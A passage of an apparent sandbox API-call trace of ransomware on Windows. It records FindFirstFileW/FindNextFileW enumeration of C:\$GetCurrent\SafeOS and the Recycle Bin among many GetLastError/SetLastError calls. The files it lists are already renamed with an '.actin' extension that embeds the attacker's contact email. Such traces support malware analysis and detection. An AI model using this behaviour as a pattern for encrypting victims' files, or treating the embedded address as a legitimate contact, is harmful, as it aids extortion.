(dwErrCode=0x0) [0134.728] GetLastError () returned 0x0 [0134.728] SetLastError (dwErrCode=0x0) [0134.728] GetLastError () returned 0x0 [0134.728] SetLastError (dwErrCode=0x0) [0134.728] GetLastError () returned 0x0 [0134.728] SetLastError (dwErrCode=0x0) [0134.728] GetLastError () returned 0x0 [0134.728] SetLastError (dwErrCode=0x0) [0134.728] GetLastError () returned 0x0 [0134.728] SetLastError (dwErrCode=0x0) [0134.728] GetLastError () returned 0x0 [0134.728] SetLastError (dwErrCode=0x0) [0134.728] GetLastError () returned 0x0 [0134.728] SetLastError (dwErrCode=0x0) [0134.728] GetLastError () returned 0x0 [0134.728] SetLastError (dwErrCode=0x0) [0134.728] GetLastError () returned 0x0 [0134.728] SetLastError (dwErrCode=0x0) [0134.729] GetLastError () returned 0x0 [0134.729] SetLastError (dwErrCode=0x0) [0134.729] GetLastError () returned 0x0 [0134.729] SetLastError (dwErrCode=0x0) [0134.729] FindNextFileW (in: hFindFile=0x13275d8, lpFindFileData=0x46bf33c | out: lpFindFileData=0x46bf33c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c6a1810, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c6a1810, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c7d2e4e, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x142, dwReserved0=0x0, dwReserved1=0x0, cFileName="PartnerSetupCompleteResult.log.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="PARTNE~1.ACT")) returned 1 [0134.729] GetLastError () returned 0x0 [0134.729] SetLastError (dwErrCode=0x0) [0134.729] GetLastError () returned 0x0 [0134.729] SetLastError (dwErrCode=0x0) [0134.729] GetLastError () returned 0x0 [0134.729] SetLastError (dwErrCode=0x0) [0134.729] GetLastError () returned 0x0 [0134.729] SetLastError (dwErrCode=0x0) [0134.729] GetLastError () returned 0x0 [0134.729] SetLastError (dwErrCode=0x0) [0134.729] GetLastError () returned 0x0 [0134.729] SetLastError (dwErrCode=0x0) [0134.729] GetLastError () returned 0x0 [0134.729] SetLastError (dwErrCode=0x0) [0134.729] GetLastError () returned 0x0 [0134.729] SetLastError (dwErrCode=0x0) [0134.729] GetLastError () returned 0x0 [0134.729] SetLastError (dwErrCode=0x0) [0134.729] GetLastError () returned 0x0 [0134.730] SetLastError (dwErrCode=0x0) [0134.730] GetLastError () returned 0x0 [0134.730] SetLastError (dwErrCode=0x0) [0134.730] GetLastError () returned 0x0 [0134.730] SetLastError (dwErrCode=0x0) [0134.730] GetLastError () returned 0x0 [0134.730] SetLastError (dwErrCode=0x0) [0134.730] GetLastError () returned 0x0 [0134.730] SetLastError (dwErrCode=0x0) [0134.730] GetLastError () returned 0x0 [0134.730] SetLastError (dwErrCode=0x0) [0134.730] GetLastError () returned 0x0 [0134.730] SetLastError (dwErrCode=0x0) [0134.730] GetLastError () returned 0x0 [0134.730] SetLastError (dwErrCode=0x0) [0134.730] GetLastError () returned 0x0 [0134.730] SetLastError (dwErrCode=0x0) [0134.730] GetLastError () returned 0x0 [0134.730] SetLastError (dwErrCode=0x0) [0134.730] GetLastError () returned 0x0 [0134.730] SetLastError (dwErrCode=0x0) [0134.730] GetLastError () returned 0x0 [0134.730] SetLastError (dwErrCode=0x0) [0134.730] GetLastError () returned 0x0 [0134.731] SetLastError (dwErrCode=0x0) [0134.731] GetLastError () returned 0x0 [0134.731] SetLastError (dwErrCode=0x0) [0134.731] GetLastError () returned 0x0 [0134.731] SetLastError (dwErrCode=0x0) [0134.731] GetLastError () returned 0x0 [0134.731] SetLastError (dwErrCode=0x0) [0134.731] GetLastError () returned 0x0 [0134.731] SetLastError (dwErrCode=0x0) [0134.731] GetLastError () returned 0x0 [0134.731] SetLastError (dwErrCode=0x0) [0134.731] GetLastError () returned 0x0 [0134.731] SetLastError (dwErrCode=0x0) [0134.731] GetLastError () returned 0x0 [0134.731] SetLastError (dwErrCode=0x0) [0134.731] GetLastError () returned 0x0 [0134.731] SetLastError (dwErrCode=0x0) [0134.731] GetLastError () returned 0x0 [0134.731] SetLastError (dwErrCode=0x0) [0134.731] GetLastError () returned 0x0 [0134.731] SetLastError (dwErrCode=0x0) [0134.731] GetLastError () returned 0x0 [0134.731] SetLastError (dwErrCode=0x0) [0134.731] GetLastError () returned 0x0 [0134.731] SetLastError (dwErrCode=0x0) [0134.732] GetLastError () returned 0x0 [0134.732] SetLastError (dwErrCode=0x0) [0134.732] GetLastError () returned 0x0 [0134.732] SetLastError (dwErrCode=0x0) [0134.732] GetLastError () returned 0x0 [0134.732] SetLastError (dwErrCode=0x0) [0134.732] GetLastError () returned 0x0 [0134.732] SetLastError (dwErrCode=0x0) [0134.732] GetLastError () returned 0x0 [0134.732] SetLastError (dwErrCode=0x0) [0134.732] GetLastError () returned 0x0 [0134.732] SetLastError (dwErrCode=0x0) [0134.732] GetLastError () returned 0x0 [0134.732] SetLastError (dwErrCode=0x0) [0134.732] GetLastError () returned 0x0 [0134.732] SetLastError (dwErrCode=0x0) [0134.732] GetLastError () returned 0x0 [0134.732] SetLastError (dwErrCode=0x0) [0134.732] GetLastError () returned 0x0 [0134.732] SetLastError (dwErrCode=0x0) [0134.732] GetLastError () returned 0x0 [0134.732] SetLastError (dwErrCode=0x0) [0134.732] GetLastError () returned 0x0 [0134.732] SetLastError (dwErrCode=0x0) [0134.732] GetLastError () returned 0x0 [0134.733] SetLastError (dwErrCode=0x0) [0134.733] GetLastError () returned 0x0 [0134.733] SetLastError (dwErrCode=0x0) [0134.733] FindNextFileW (in: hFindFile=0x13275d8, lpFindFileData=0x46bf33c | out: lpFindFileData=0x46bf33c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c6a1810, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c6a1810, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c7d2e4e, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x142, dwReserved0=0x0, dwReserved1=0x0, cFileName="PartnerSetupCompleteResult.log.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="PARTNE~1.ACT")) returned 0 [0134.733] FindClose (in: hFindFile=0x13275d8 | out: hFindFile=0x13275d8) returned 1 [0134.734] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x43b1ad8 | out: hHeap=0x2cb0000) returned 1 [0134.734] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="SafeOS", cAlternateFileName="")) returned 1 [0134.734] GetLastError () returned 0x12 [0134.734] SetLastError (dwErrCode=0x12) [0134.734] GetLastError () returned 0x12 [0134.734] SetLastError (dwErrCode=0x12) [0134.734] GetLastError () returned 0x12 [0134.734] SetLastError (dwErrCode=0x12) [0134.734] GetLastError () returned 0x12 [0134.734] SetLastError (dwErrCode=0x12) [0134.734] GetLastError () returned 0x12 [0134.734] SetLastError (dwErrCode=0x12) [0134.734] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10000) returned 0x43b1ad8 [0134.734] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\*", lpFindFileData=0x46bf33c | out: lpFindFileData=0x46bf33c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1326f58 [0134.735] FindNextFileW (in: hFindFile=0x1326f58, lpFindFileData=0x46bf33c | out: lpFindFileData=0x46bf33c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0134.735] FindNextFileW (in: hFindFile=0x1326f58, lpFindFileData=0x46bf33c | out: lpFindFileData=0x46bf33c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c4654a7, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c4654a7, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c4b1999, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x233d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="GetCurrentOOBE.dll.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="GETCUR~1.ACT")) returned 1 [0134.735] GetLastError () returned 0x12 [0134.735] SetLastError (dwErrCode=0x12) [0134.735] GetLastError () returned 0x12 [0134.735] SetLastError (dwErrCode=0x12) [0134.735] GetLastError () returned 0x12 [0134.735] SetLastError (dwErrCode=0x12) [0134.735] GetLastError () returned 0x12 [0134.736] SetLastError (dwErrCode=0x12) [0134.736] GetLastError () returned 0x12 [0134.736] SetLastError (dwErrCode=0x12) [0134.736] GetLastError () returned 0x12 [0134.736] SetLastError (dwErrCode=0x12) [0134.736] GetLastError () returned 0x12 [0134.736] SetLastError (dwErrCode=0x12) [0134.736] GetLastError () returned 0x12 [0134.736] SetLastError (dwErrCode=0x12) [0134.736] GetLastError () returned 0x12 [0134.736] SetLastError (dwErrCode=0x12) [0134.736] GetLastError () returned 0x12 [0134.736] SetLastError (dwErrCode=0x12) [0134.736] GetLastError () returned 0x12 [0134.736] SetLastError (dwErrCode=0x12) [0134.736] GetLastError () returned 0x12 [0134.736] SetLastError (dwErrCode=0x12) [0134.736] GetLastError () returned 0x12 [0134.736] SetLastError (dwErrCode=0x12) [0134.736] GetLastError () returned 0x12 [0134.736] SetLastError (dwErrCode=0x12) [0134.736] GetLastError () returned 0x12 [0134.736] SetLastError (dwErrCode=0x12) [0134.736] GetLastError () returned 0x12 [0134.736] SetLastError (dwErrCode=0x12) [0134.737] GetLastError () returned 0x12 [0134.737] SetLastError (dwErrCode=0x12) [0134.737] GetLastError () returned 0x12 [0134.737] SetLastError (dwErrCode=0x12) [0134.737] GetLastError () returned 0x12 [0134.737] SetLastError (dwErrCode=0x12) [0134.737] GetLastError () returned 0x12 [0134.737] SetLastError (dwErrCode=0x12) [0134.737] GetLastError () returned 0x12 [0134.737] SetLastError (dwErrCode=0x12) [0134.737] GetLastError () returned 0x12 [0134.737] SetLastError (dwErrCode=0x12) [0134.737] GetLastError () returned 0x12 [0134.737] SetLastError (dwErrCode=0x12) [0134.737] GetLastError () returned 0x12 [0134.737] SetLastError (dwErrCode=0x12) [0134.737] GetLastError () returned 0x12 [0134.737] SetLastError (dwErrCode=0x12) [0134.737] GetLastError () returned 0x12 [0134.737] SetLastError (dwErrCode=0x12) [0134.737] GetLastError () returned 0x12 [0134.737] SetLastError (dwErrCode=0x12) [0134.737] GetLastError () returned 0x12 [0134.737] SetLastError (dwErrCode=0x12) [0134.737] GetLastError () returned 0x12 [0134.738] SetLastError (dwErrCode=0x12) [0134.738] GetLastError () returned 0x12 [0134.738] SetLastError (dwErrCode=0x12) [0134.738] GetLastError () returned 0x12 [0134.738] SetLastError (dwErrCode=0x12) [0134.738] GetLastError () returned 0x12 [0134.738] SetLastError (dwErrCode=0x12) [0134.738] GetLastError () returned 0x12 [0134.738] SetLastError (dwErrCode=0x12) [0134.738] GetLastError () returned 0x12 [0134.738] SetLastError (dwErrCode=0x12) [0134.738] GetLastError () returned 0x12 [0134.738] SetLastError (dwErrCode=0x12) [0134.738] GetLastError () returned 0x12 [0134.738] SetLastError (dwErrCode=0x12) [0134.738] GetLastError () returned 0x12 [0134.738] SetLastError (dwErrCode=0x12) [0134.738] GetLastError () returned 0x12 [0134.738] SetLastError (dwErrCode=0x12) [0134.738] GetLastError () returned 0x12 [0134.738] SetLastError (dwErrCode=0x12) [0134.738] GetLastError () returned 0x12 [0134.738] SetLastError (dwErrCode=0x12) [0134.738] GetLastError () returned 0x12 [0134.738] SetLastError (dwErrCode=0x12) [0134.739] GetLastError () returned 0x12 [0134.739] SetLastError (dwErrCode=0x12) [0134.739] GetLastError () returned 0x12 [0134.739] SetLastError (dwErrCode=0x12) [0134.739] GetLastError () returned 0x12 [0134.739] SetLastError (dwErrCode=0x12) [0134.739] GetLastError () returned 0x12 [0134.739] SetLastError (dwErrCode=0x12) [0134.739] GetLastError () returned 0x12 [0134.739] SetLastError (dwErrCode=0x12) [0134.739] GetLastError () returned 0x12 [0134.739] SetLastError (dwErrCode=0x12) [0134.739] GetLastError () returned 0x12 [0134.739] SetLastError (dwErrCode=0x12) [0134.739] FindNextFileW (in: hFindFile=0x1326f58, lpFindFileData=0x46bf33c | out: lpFindFileData=0x46bf33c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c73a4a4, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c73a4a4, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c73a4a4, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x1a2, dwReserved0=0x0, dwReserved1=0x0, cFileName="GetCurrentRollback.ini.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="GETCUR~2.ACT")) returned 1 [0134.739] GetLastError () returned 0x12 [0134.739] SetLastError (dwErrCode=0x12) [0134.739] GetLastError () returned 0x12 [0134.739] SetLastError (dwErrCode=0x12) [0134.739] GetLastError () returned 0x12 [0134.739] SetLastError (dwErrCode=0x12) [0134.739] GetLastError () returned 0x12 [0134.739] SetLastError (dwErrCode=0x12) [0134.739] GetLastError () returned 0x12 [0134.740] SetLastError (dwErrCode=0x12) [0134.740] GetLastError () returned 0x12 [0134.740] SetLastError (dwErrCode=0x12) [0134.740] GetLastError () returned 0x12 [0134.740] SetLastError (dwErrCode=0x12) [0134.740] GetLastError () returned 0x12 [0134.740] SetLastError (dwErrCode=0x12) [0134.740] GetLastError () returned 0x12 [0134.740] SetLastError (dwErrCode=0x12) [0134.740] GetLastError () returned 0x12 [0134.740] SetLastError (dwErrCode=0x12) [0134.740] GetLastError () returned 0x12 [0134.740] SetLastError (dwErrCode=0x12) [0134.740] GetLastError () returned 0x12 [0134.740] SetLastError (dwErrCode=0x12) [0134.740] GetLastError () returned 0x12 [0134.740] SetLastError (dwErrCode=0x12) [0134.740] GetLastError () returned 0x12 [0134.740] SetLastError (dwErrCode=0x12) [0134.740] GetLastError () returned 0x12 [0134.740] SetLastError (dwErrCode=0x12) [0134.740] GetLastError () returned 0x12 [0134.740] SetLastError (dwErrCode=0x12) [0134.740] GetLastError () returned 0x12 [0134.741] SetLastError (dwErrCode=0x12) [0134.741] GetLastError () returned 0x12 [0134.741] SetLastError (dwErrCode=0x12) [0134.741] GetLastError () returned 0x12 [0134.741] SetLastError (dwErrCode=0x12) [0134.741] GetLastError () returned 0x12 [0134.741] SetLastError (dwErrCode=0x12) [0134.741] GetLastError () returned 0x12 [0134.741] SetLastError (dwErrCode=0x12) [0134.741] GetLastError () returned 0x12 [0134.741] SetLastError (dwErrCode=0x12) [0134.741] GetLastError () returned 0x12 [0134.741] SetLastError (dwErrCode=0x12) [0134.741] GetLastError () returned 0x12 [0134.741] SetLastError (dwErrCode=0x12) [0134.741] GetLastError () returned 0x12 [0134.741] SetLastError (dwErrCode=0x12) [0134.741] GetLastError () returned 0x12 [0134.741] SetLastError (dwErrCode=0x12) [0134.741] GetLastError () returned 0x12 [0134.741] SetLastError (dwErrCode=0x12) [0134.741] GetLastError () returned 0x12 [0134.741] SetLastError (dwErrCode=0x12) [0134.741] GetLastError () returned 0x12 [0134.741] SetLastError (dwErrCode=0x12) [0134.742] GetLastError () returned 0x12 [0134.742] SetLastError (dwErrCode=0x12) [0134.742] GetLastError () returned 0x12 [0134.742] SetLastError (dwErrCode=0x12) [0134.742] GetLastError () returned 0x12 [0134.742] SetLastError (dwErrCode=0x12) [0134.742] GetLastError () returned 0x12 [0134.742] SetLastError (dwErrCode=0x12) [0134.742] GetLastError () returned 0x12 [0134.742] SetLastError (dwErrCode=0x12) [0134.742] GetLastError () returned 0x12 [0134.742] SetLastError (dwErrCode=0x12) [0134.742] GetLastError () returned 0x12 [0134.742] SetLastError (dwErrCode=0x12) [0134.742] GetLastError () returned 0x12 [0134.742] SetLastError (dwErrCode=0x12) [0134.742] GetLastError () returned 0x12 [0134.742] SetLastError (dwErrCode=0x12) [0134.742] GetLastError () returned 0x12 [0134.742] SetLastError (dwErrCode=0x12) [0134.742] GetLastError () returned 0x12 [0134.742] SetLastError (dwErrCode=0x12) [0134.742] GetLastError () returned 0x12 [0134.742] SetLastError (dwErrCode=0x12) [0134.743] FindNextFileW (in: hFindFile=0x1326f58, lpFindFileData=0x46bf33c | out: lpFindFileData=0x46bf33c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c73a4a4, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c73a4a4, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c73a4a4, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x362, dwReserved0=0x0, dwReserved1=0x0, cFileName="PartnerSetupComplete.cmd.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="PARTNE~1.ACT")) returned 1 [0134.743] FindNextFileW (in: hFindFile=0x1326f58, lpFindFileData=0x46bf33c | out: lpFindFileData=0x46bf33c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c760448, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c760448, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c760448, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x142, dwReserved0=0x0, dwReserved1=0x0, cFileName="preoobe.cmd.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="PREOOB~1.ACT")) returned 1 [0134.743] FindNextFileW (in: hFindFile=0x1326f58, lpFindFileData=0x46bf33c | out: lpFindFileData=0x46bf33c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c760448, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c760448, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c760448, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x242, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupComplete.cmd.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPC~1.ACT")) returned 1 [0134.743] FindNextFileW (in: hFindFile=0x1326f58, lpFindFileData=0x46bf33c | out: lpFindFileData=0x46bf33c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c760448, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c760448, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c760448, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x242, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupComplete.cmd.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPC~1.ACT")) returned 0 [0134.743] FindClose (in: hFindFile=0x1326f58 | out: hFindFile=0x1326f58) returned 1 [0134.744] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x43b1ad8 | out: hHeap=0x2cb0000) returned 1 [0134.744] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="SafeOS", cAlternateFileName="")) returned 0 [0134.744] FindClose (in: hFindFile=0x13273d8 | out: hFindFile=0x13273d8) returned 1 [0134.744] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x43a1ad0 | out: hHeap=0x2cb0000) returned 1 [0134.744] FindNextFileW (in: hFindFile=0x1327598, lpFindFileData=0x46bf844 | out: lpFindFileData=0x46bf844*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffff718, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 1 [0134.745] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$Recycle.Bin\\*", lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x153, cFileName=".", cAlternateFileName="")) returned 0x1326f58 [0134.745] FindNextFileW (in: hFindFile=0x1326f58, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x153, cFileName="..", cAlternateFileName="")) returned 1 [0134.745] FindNextFileW (in: hFindFile=0x1326f58, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x153, cFileName="S-1-5-18", cAlternateFileName="")) returned 1 [0134.745] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-18\\*", lpFindFileData=0x46bf33c | out: lpFindFileData=0x46bf33c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x12f7a5a, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x16, ftLastAccessTime.dwHighDateTime=0x2, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\xfad0\x46b\x1ad0\x43a\x5c\x5c\x3f\x5c\x1af8\x43a\xf59c\x46b\x39c8\x115\x08\x01\x1ad8\x43a")) returned 0xffffffff [0134.745] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x43b1ad8 | out: hHeap=0x2cb0000) returned 1 [0134.745] FindNextFileW (in: hFindFile=0x1326f58, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x7ac3fed, ftLastAccessTime.dwHighDateTime=0x1d53298, ftLastWriteTime.dwLowDateTime=0x7ac3fed, ftLastWriteTime.dwHighDateTime=0x1d53298, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x153, cFileName="S-1-5-21-1051304884-625712362-2192934891-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0134.745] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\*", lpFindFileData=0x46bf33c | out: lpFindFileData=0x46bf33c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x7ac3fed, ftLastAccessTime.dwHighDateTime=0x1d53298, ftLastWriteTime.dwLowDateTime=0x7ac3fed, ftLastWriteTime.dwHighDateTime=0x1d53298, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x13275d8 [0134.745] FindNextFileW (in: hFindFile=0x13275d8, lpFindFileData=0x46bf33c | out: lpFindFileData=0x46bf33c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x7ac3fed, ftLastAccessTime.dwHighDateTime=0x1d53298, ftLastWriteTime.dwLowDateTime=0x7ac3fed, ftLastWriteTime.dwHighDateTime=0x1d53298, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0134.745] FindNextFileW (in: hFindFile=0x13275d8, lpFindFileData=0x46bf33c | out: lpFindFileData=0x46bf33c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7ac3fed, ftCreationTime.dwHighDateTime=0x1d53298, ftLastAccessTime.dwLowDateTime=0x7ac3fed, ftLastAccessTime.dwHighDateTime=0x1d53298, ftLastWriteTime.dwLowDateTime=0x7ac3fed, ftLastWriteTime.dwHighDateTime=0x1d53298, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0134.745] FindNextFileW (in: hFindFile=0x13275d8, lpFindFileData=0x46bf33c | out: lpFindFileData=0x46bf33c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c7d2e4e, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c7d2e4e, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c7d2e4e, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="DESKTO~1.ACT")) returned 1 [0134.746] FindNextFileW (in: hFindFile=0x13275d8, lpFindFileData=0x46bf33c | out: lpFindFileData=0x46bf33c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c7d2e4e, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c7d2e4e, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c7d2e4e, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="DESKTO~1.ACT")) returned 0 [0134.746] FindClose (in: hFindFile=0x13275d8 | out: hFindFile=0x13275d8) returned 1 [0134.746] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x43b1ad8 | out: hHeap=0x2cb0000) returned 1 [0134.746] FindNextFileW (in: hFindFile=0x1326f58, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, 